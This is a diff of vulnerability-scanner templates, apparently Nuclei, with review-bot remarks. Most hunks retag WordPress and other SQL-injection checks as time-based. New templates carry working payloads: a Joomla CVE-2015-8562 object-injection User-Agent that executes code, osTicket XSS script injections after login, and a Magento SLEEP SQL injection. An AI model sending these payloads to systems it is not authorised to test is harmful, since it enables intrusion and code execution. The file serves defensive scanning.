# digest: 4b0a00483046022100b97dc7216d247bc3f2a24b3c5f7cc69ec237ac053ae91149c8c54229febc73ba022100a2c9b0d7bfdd0c58db33d911d5b00093258fd66f97aee175992679341128cb1b:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: web-dorado
product: spider_calendar
framework: wordpress
tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado
tags: time-based-sqli,cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado
http:
- raw:
@ -44,4 +44,4 @@ http:
- 'status_code == 200'
- 'contains(body, "{\"status\":true,\"data\"")'
condition: and
# digest: 4a0a00473045022100daa723288b7ba31445615bf88d494dcea46bb73348e396a696dc4d3b653ff0a80220203c1979571b1052fe8581945a95d5755c8615d7b21138426b14f4a67c8867c2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d0d1de19b601f462ee58d28e0503bb93bcc23d3e3718449465cc90430ed0dde502205ce2cf1f373b2d5de5bb045a0506585f59b2f45bc8670208d0640382a01cabdc:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: newstatpress_project
product: newstatpress
framework: wordpress
tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project
tags: time-based-sqli,cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project
http:
- raw:
@ -52,4 +52,4 @@ http:
- 'status_code == 200'
- 'contains(body_2, "newstatpress_page_nsp_search")'
condition: and
# digest: 490a0046304402206afe631ad8f093e0e82bb2d01736518d96616950971ac077d2ed68d07fc2209b02204867eca23d5337e9b83cb4066ed5a73d791aa434fe9f29e1b1f4762ae55b7368:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100e0252d78abb451e9b3508dd9733adb456ea9f5a41268037aef0e6eca1d4303320220554bd533cd1baab8aad20fc9f3dccb5a319b328b480a6f029363115b7922cc20:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,62 @@
id: CVE-2015-8562
info:
name: Joomla HTTP Header Unauthenticated - Remote Code Execution
author: kairos-hk,bolkv,n0ming,RoughBoy0723
description: |
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015
severity: high
reference:
- https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562
- https://nvd.nist.gov/vuln/detail/CVE-2015-8562
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2015-8562
metadata:
max-request: 2
vendor: joomla
product: joomla\!
shodan-query:
- http.html:"joomla! - open source content management"
- http.component:"joomla"
- cpe:"cpe:2.3:a:joomla:joomla\!"
fofa-query: body="joomla! - open source content management"
tags: cve,cve2015,joomla,rce,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"Joomla")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100e9d585daa1c154a8a02cc56a9950cd6acf63af5aadea9ee9343e00847d05bf77022100a3f090d371c718e2cdb376477d31caa13c53141325dddb998a2722d21cb4248b:922c64590222798bb761d5b6d8e72950
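Review bot: The `info` block has no `remediation` field even though the description names the fixed release; `remediation: Upgrade Joomla! to 3.4.6 or later.` would give the finding an actionable fix. The second request's matcher accepts any 200 response whose body contains both `PHP Extension` and `PHP Version`, which are generic phpinfo strings, so a comment above it such as `# match relies on phpinfo output in the response to the crafted User-Agent` would help whoever triages a hit. Because the check executes code on the target rather than only fingerprinting it, the `tags` line should presumably also carry `intrusive`, so that scans excluding that tag skip this template.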


@ -29,7 +29,7 @@ info:
vendor: duckdev
product: 404_to_301
framework: wordpress
tags: cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev
tags: time-based-sqli,cve2015,cve,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated,duckdev
http:
- raw:
@ -52,4 +52,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "404-to-301")'
condition: and
# digest: 4b0a00483046022100c27236f98002c3fa3feb31b6084010a0885416d66e5f558006f1e087f2c42369022100de53fe3a0f1b9880b34c9db76ee96cd7e8fe47827ba3e6701ed0c0cd911b5942:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206e6e7dd877da87520e9728b32f5386752ac86d0582b6f4dec906e323cb09ab04022027471d6a5d1e20347d22983a5ed786ef95ba57cc750709594d63b455212bd279:922c64590222798bb761d5b6d8e72950


@ -31,7 +31,7 @@ info:
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/gift-voucher/"
fofa-query: body="/wp-content/plugins/gift-voucher/"
tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen
tags: time-based-sqli,cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen
http:
- raw:
@ -51,4 +51,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "images") && contains(body, "title")'
condition: and
# digest: 490a00463044022039c62ea7189c856952f0a35cfb1c5bcc09fd83a4aae6a766e8357ce6c29625e202204b8b8f1561357042ae671f4d7d5166f074ce46d7d8586fb02316afdd260df3bd:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e13c5de79aecef68dd8703a19cad639b46d46ac326ba001f9984084c5080fd0a022100a4e65fde4fa3b8c1d7d197d9f04ea147e94caf0ef409a54f4ced1916f0ed4578:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,75 @@
id: CVE-2018-7192
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "message" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7192
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7192
cwe-id: CWE-79
epss-score: 0.00172
epss-percentile: 0.54693
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /ajax.php/form/help-topic/1?a934f512c6644b03=&message=dgh7r%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20qavj5 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "dgh7r onmouseover=alert(document.domain) style=position:")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221009ec71e04f5587f9555c3a6455856fe0707c97016bf732bb2d32d3820c3c849990220474b01d82393e9e7e06e06b45821eebf52976c16c985bafab24e31a373fe90e5:922c64590222798bb761d5b6d8e72950
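Review bot: `remediation` says only "Upgrade osTicket to later version" although the description gives the fixed release; `Upgrade osTicket to 1.10.2 or later.` is specific and reads correctly. The `name` value `osTicket < 1.10.2 - Cross-Site Scripting` is identical here and in the CVE-2018-7193 and CVE-2018-7196 templates added by the same commit, so results from the three cannot be told apart by name. Adding the affected endpoint, for example `osTicket < 1.10.2 - Cross-Site Scripting (help-topic form)`, would fix that. Both points apply to the other two osTicket sections as well.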


@ -0,0 +1,75 @@
id: CVE-2018-7193
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "order" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7193
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7193
cwe-id: CWE-79
epss-score: 0.00172
epss-percentile: 0.54693
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /scp/directory.php?&&order="><script>alert(document.domain);</script>&sort=dept HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "\"><script>alert(document.domain);</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100cbec67f214c6e316f3cd571c048efe4b5fa30471027dd468a2389f12c0f5d6300220723b75f7d4347a6bd1b0a8d70329eee12753226569f662899a1c2fb853b4a7a4:922c64590222798bb761d5b6d8e72950
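Review bot: Nothing in this template tells the operator that it needs staff credentials, and no matcher confirms that the login succeeded: the second block posts `{{username}}` and `{{password}}` to `/scp/login.php` and then only checks for the reflected string. A rejected login and a patched target therefore both end in "no match". I would state the requirement in the description, e.g. `Requires valid staff panel credentials supplied as the username and password variables.`, and add a comment above the second `raw` block noting that a failed login produces no result. The CVE-2018-7192 and CVE-2018-7196 sections use the same login step and have the same gap.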


@ -0,0 +1,73 @@
id: CVE-2018-7196
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "sort" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7196
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7196
cwe-id: CWE-79
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /scp/index.php?sort="><script>alert(document.domain);</script>&dir=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "\"><script>alert(document.domain);</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402202a3bfee629128ded92342fc0366e48e742ede36203e4d9989eb86598ea466e1502200b83765e3c103aa1bb774995dbad2ffcd07ab46b6a05c27e26c939dd4f48a023:922c64590222798bb761d5b6d8e72950


@ -31,7 +31,7 @@ info:
fofa-query: title="printmonitor"
google-query: intitle:"printmonitor"
product": printmonitor
tags: cve2018,cve,sqli,printmonitor,unauth,titool
tags: time-based-sqli,cve2018,cve,sqli,printmonitor,unauth,titool
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
@ -54,4 +54,4 @@ http:
- 'status_code == 200'
- 'contains(body, "PrintMonitor") && contains(header, "text/html")'
condition: and
# digest: 4a0a00473045022100ec573b18c670d29560ed71dcf93443f68e034fce66f06294bf0b23aeadb462e1022003bfb3d3de007d87998765d3ec871ac5efff191cf95c1a2f148e89d9a66816d5:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220350b85c022a2f7990b3549695690835a5a3c0eca188c61a231dcdbc042bacc8c0220182ccd815189f39984575638fc122b9947b072a99b8d98e22dec0d524e4ca452:922c64590222798bb761d5b6d8e72950
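Review bot: The context line `product": printmonitor` has a stray double quote in the key, so the mapping key is `product"` rather than `product`, and this commit re-signs the file without correcting it. The line should read `product: printmonitor`; the `# digest:` line would then presumably need regenerating once more. The `info` block starts above the hunk, so whether this key sits under `metadata` as in the other templates cannot be confirmed from here.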


@ -32,7 +32,7 @@ info:
- http.component:"Magento"
- cpe:"cpe:2.3:a:magento:magento"
- http.component:"magento"
tags: cve,cve2019,sqli,magento
tags: time-based-sqli,cve,cve2019,sqli,magento
flow: http(1) && http(2)
@ -55,7 +55,7 @@ http:
- raw:
- |
@timeout: 20s
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((8)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
- |
@ -72,7 +72,7 @@ http:
- type: dsl
name: time-based
dsl:
- 'duration_1>=6'
- 'duration_1>=8'
- 'contains(content_type_1, "application/json")'
condition: and
@ -83,4 +83,4 @@ http:
- 'status_code_2 == 200 && status_code_3 == 400'
- 'len(body_2) == 2 && len(body_3) == 2'
condition: and
# digest: 4a0a0047304502205a69b6ef9b1728b6a46cb23445d714f64558e680f3e39937cb4d3800f7c59669022100f12e75e00939482a564c76ed2fdcc3b2319eccdce9539afd2805c5a4353a4a35:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100a80a39e0c4a72d86fae82b5e46b7e70f22b03fbc5b52f694ca36560f81946c520220015ed98158a92faf65ae029e01eec1e7962bbb7273ee01c02c0ceffbcadd34c0:922c64590222798bb761d5b6d8e72950
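Review bot: The `time-based` matcher still decides on a single timing sample: `duration_1>=8` together with a JSON content type is also met by a backend that is simply slow to answer, so raising the delay from 6 to 8 seconds lowers the false-positive rate without closing it. A comment above the matcher such as `# single timing sample; confirm hits on slow or rate-limited hosts` would make that limit explicit. The delay now appears as a literal both in the request line and in the matcher, and a second comment saying the two values must change together would stop them drifting apart. Both hunks cut into blocks that start and end outside the visible lines.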


@ -30,7 +30,7 @@ info:
vendor: idangero
product: chop_slider
framework: wordpress
tags: cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero
tags: time-based-sqli,cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "application/javascript")'
- 'contains(body, "$(document).ready(function()")'
condition: and
# digest: 4a0a00473045022100cf4f7ac39414a286782cc1465b2e846928bf6384fd900c4b102cef03995c8496022013ce04ef0b306d3248491918201ad410693f3e67d90d2b836a6faf942e301aa6:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206abae22800a03afe90c44ef6d3705a376f5aaa027225e4c7b4e7bed52864aaab022019592374fb3278a65252f94f4caabd678d0a98eb3d6e2ed59d8cfa4cf4d677e3:922c64590222798bb761d5b6d8e72950


@ -31,7 +31,7 @@ info:
shodan-query: http.title:"fuel cms"
fofa-query: title="fuel cms"
google-query: intitle:"fuel cms"
tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio
tags: time-based-sqli,cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio
http:
- raw:
@ -65,4 +65,4 @@ http:
- 'status_code_3 == 200'
- 'contains(body_1, "FUEL CMS")'
condition: and
# digest: 490a0046304402204c4bf6a24a18789f4b4c053b1ede99fad9d47bbe442a41be6d1ff8f46e32a011022050174e6bebe598ce43b4b667f73bc6aad238238abed9332fd136e43b4feaa386:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022015d2201ff7a238aea6a71fe1375f8a1d608ec867a5f3956aea11a30fda642da802206370686dc03f6b7ea9742a3c1fa820d9559a43cd8ca463171ff0036b27f8eb9b:922c64590222798bb761d5b6d8e72950


@ -29,7 +29,7 @@ info:
vendor: prestashop
product: productcomments
framework: prestashop
tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop
tags: time-based-sqli,cve,cve2020,packetstorm,sqli,prestshop,prestashop
http:
- raw:
@ -46,4 +46,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# digest: 4b0a00483046022100bfb60507528a715a3186e6f06262c9534c16003bc96c3baa4049108a3d06d67a0221008662896abf6d4938c136f30d2492fc638fb1157aea901a3875741b3251869743:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ba36b4b1b8b3de0a170016e0df7dc4bc129a2a432a66313495e10a2c5726b0220220641950cb27c6dfd36692ed81dc14d36385dc86e8b2c553c218672acb507375ba:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
vendor: goodlayers
product: good_learning_management_system
framework: wordpress
tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress
tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress
http:
- raw:
@ -46,4 +46,4 @@ http:
- "status_code == 200"
- "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"
condition: and
# digest: 4a0a00473045022100de8e68d9f94b82af184c4830778f5a38d929abe4ad7c1b9a60ab64389a0adf0102200abfa6c9701dce38f221abae9f7130bf100efa9f0c5232356ad4a034340561b1:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022047ea54dad2e6f0b6e744ccaadbbb117fa2e46dcae0344ab5e33cfa881be486ab02210083f8497ca49054443bbd084df6eeeae0ba2a9f33a3453d8ce97fdc9b778b3265:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
fofa-query: body=/wp-content/plugins/wp-statistics/
publicwww-query: /wp-content/plugins/wp-statistics/
google-query: inurl:/wp-content/plugins/wp-statistics
tags: cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs
tags: time-based-sqli,cve2021,cve,wp-plugin,unauth,wpscan,wordpress,sqli,blind,edb,veronalabs
http:
- raw:
@ -56,4 +56,4 @@ http:
- 'status_code_2 == 500'
- 'contains(body_2, ">WordPress &rsaquo; Error<") && contains(body_2, ">Your request is not valid.<")'
condition: and
# digest: 4a0a00473045022100f81cc6ae63a3716745a9d2b7b36392e91421d0e2429ef59ea0be12290d02643302204e0b0cd1ce6bc440c4c53e079c3bc7406fc60f36b6f79cf10bce774aee58942d:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100accee4cf0582472a2200204cfef2221077c1dd6d3e58bfda460c7b81d553085902210099ae808f6eb88442a9b53e94eeb038b7af80d4962258bcde5adb7308ee95d052:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
shodan-query: http.html:/wp-content/plugins/polls-widget/
fofa-query: body=/wp-content/plugins/polls-widget/
publicwww-query: "/wp-content/plugins/polls-widget/"
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart
tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart
http:
- raw:
@ -48,4 +48,4 @@ http:
- 'status_code == 200'
- 'contains_all(body, "{\"answer_name", "vote\":")'
condition: and
# digest: 4a0a0047304502203414f57b4fe1500e69a1e44d86edb4c318855b78e1113d2423dd48e3a6931a04022100f3d562735c04bf9943dbdfb808ebfa20790e58f4c6f5643d8c89eb10e12c69e6:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100dcb435610780d47753f97f6a5e59252f21a24518ce51b148b16b50d1090de4b5022100bb68a6f6afb34ccd43ff058d18ec33757aa803d16002f94b456d592a899644ec:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: freelancetoindia
product: paytm-pay
framework: wordpress
tags: cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia
tags: time-based-sqli,cve,cve2021,sqli,wordpress,wp-plugin,wp,wp-paytm-pay,wpscan,freelancetoindia
http:
- raw:
@ -53,4 +53,4 @@ http:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "paytm-settings_page_wp_paytm_donation")'
condition: and
# digest: 4b0a00483046022100b092e95ed6c8648f9314bf91ab75d65da7ed441e0f53438cb2f29fef0b3fc15d022100ad4c2f079591cb0fd9d7d2c4072ef01d722fee1c9c8e7385c0669f87453932c7:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022077c870303c44c07b438aa81a4bd842ebd26edc6163c3f19b6b0a3644e52f29cf0220472a02deab2f4c650074d0812c4bd9ebe923480459f4dc9986538698ddcbd18f:922c64590222798bb761d5b6d8e72950


@ -27,7 +27,7 @@ info:
vendor: genetechsolutions
product: pie_register
framework: wordpress
tags: cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions
tags: time-based-sqli,cve,cve2021,sqli,wpscan,wordpress,wp-plugin,wp,pie-register,unauth,genetechsolutions
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "application/json")'
- 'contains(body, "User credentials are invalid.")'
condition: and
# digest: 4b0a00483046022100fb5b4e734fba05c09c1c094c94b84b400b14dcba5ef57448829d5b5d3016005a022100d239aadd95068d42bf67a4af289a4912b7ae0c574f6d7a721d993912ffcfd81c:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220043db5a1aa38db15da9b83bb8888849fc550589571bc4bc7d844e9973d7fa55e02201190ffe889da257be06b7a2163a9ae780b47f5fea107aae6867c33a7b0959243:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: getperfectsurvey
product: perfect_survey
framework: wordpress
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
http:
- raw:
@ -51,4 +51,4 @@ http:
- type: status
status:
- 404
# digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502206b8f505cf063a366677aff951ab3ac77b7a042733ab630621041ce8512afdfeb022100e3629201f4d6f5c29d073a6f5fe6e1ab99e571c0fc9b1f9d00dc70fc9c6ebcc1:922c64590222798bb761d5b6d8e72950


@ -26,7 +26,7 @@ info:
product: header_footer_code_manager
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress
tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,header-footer-code-manager,draftpress
http:
- raw:
@ -49,4 +49,4 @@ http:
- 'contains(content_type_2, "text/html")'
- 'contains(body_2,"Add New Snippet")'
condition: and
# digest: 4a0a0047304502210095714900b273532b79c9b68b4b7daad27ed4f8b54d5e90deef7d4e7820dc084702206369f1b610cf19a0d46bf27a00db0246bcaf269e93d481a69a1d44812064a241:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022045af518596bfcb30054d6f0284c6a3806c58e62a6faf3c250299f5fbfb448b06022058a760ac3ffc7cc75ea58c8bcde760ee3fbfbc63ea5bb88bc6338c1f2157a493:922c64590222798bb761d5b6d8e72950


@ -30,7 +30,7 @@ info:
vendor: asgaros
product: asgaros_forum
framework: wordpress
tags: cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros
tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros
http:
- raw:
@ -47,4 +47,4 @@ http:
- 'contains(content_type, "text/html")'
- 'contains(body, "asgarosforum")'
condition: and
# digest: 4b0a00483046022100f0bde1de52443d3ddd17e9f337ab1944196721460c9f115b112be0cae1ccf101022100ea65d1cc352cc3a866999d55ce3fe60120bf86c60e25d1b34ce21d6e1997a677:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d8fd318ec87896aa55d82aafa093ed264a5ff5bf3d9be27458a435d3879e0ff8022100f73122c01a76630add3c2933188f4783e3f2ab0d301451748ab013bdc3fb7971:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace
fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
flow: http(1) && http(2)
http:
@ -68,4 +68,4 @@ http:
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100f32bfb982d6b9ecf94822be9dda7549ba4b23cb290e4a01e636d46c7fe1fab8c0221008f0b3e8572758ce4a02c5101fcc49055884f2f6305b017bc1468bb213fdc8e07:922c64590222798bb761d5b6d8e72950


@ -29,7 +29,7 @@ info:
vendor: metagauss
product: registrationmagic
framework: wordpress
tags: cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss
tags: time-based-sqli,cve,cve2021,wpscan,wp-plugin,wordpress,wp,registrationmagic,sqli,authenticated,packetstorm,metagauss
http:
- raw:
@ -54,4 +54,4 @@ http:
- 'status_code_2 == 200'
- 'contains(body_3, "rm_user_role_mananger_form")'
condition: and
# digest: 4a0a00473045022100e094ec14b2add716b2cc645857d709bbe7216d825cb1b18ce5b7733457860e2c02206859da8890901f7219e49f41586f721cfc4c7b1adfb4768948e8eaf03da4ba26:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022010a1241115e4534524145899ea6c8c560ba03ecb8a7562b81aea23abb010510e022023d95ae5fe85c8e4f30b630405b2f4698f59916a79a815573c68e139bc1c2ffb:922c64590222798bb761d5b6d8e72950


@ -28,7 +28,7 @@ info:
vendor: ays-pro
product: secure_copy_content_protection_and_content_locking
framework: wordpress
tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro
tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro
http:
- raw:
@ -45,4 +45,4 @@ http:
